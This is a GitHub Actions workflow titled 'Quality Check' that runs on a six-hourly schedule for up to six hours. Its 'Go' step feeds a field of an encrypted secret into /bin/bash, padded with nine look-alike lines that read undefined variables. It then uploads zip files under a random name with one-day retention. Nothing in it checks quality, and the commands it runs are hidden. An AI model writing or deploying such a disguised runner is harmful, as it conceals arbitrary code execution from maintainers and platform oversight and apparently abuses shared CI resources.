name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '23 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          thvdv3: ${{ secrets.thvdv3 }}
        run: |
          printf '%s' "$thvdv3" | jq -r .akyyi67 | /bin/bash
          printf '%s' "$yiuoh1535" | jq -r .by4 | /bin/bash
          echo $axho5 | jq -r .s19564 | /bin/bash
          printf '%s' "$kycfm3" | jq -r .dbh4127 | /bin/bash
          printf '%s' "$vmtd2" | jq -r .lq9 | /bin/bash
          echo $ybt34 | jq -r .uolc22 | /bin/bash
          printf '%s' "$unn36" | jq -r .tjqy28 | /bin/bash
          printf '%s' "$srfii323" | jq -r .a13374 | /bin/bash
          printf '%s' "$snds8" | jq -r .ptnr817 | /bin/bash
          printf '%s' "$ftypc00948" | jq -r .m2147 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: fzQEzlgq
          path: "*.zip"
          retention-days: 1
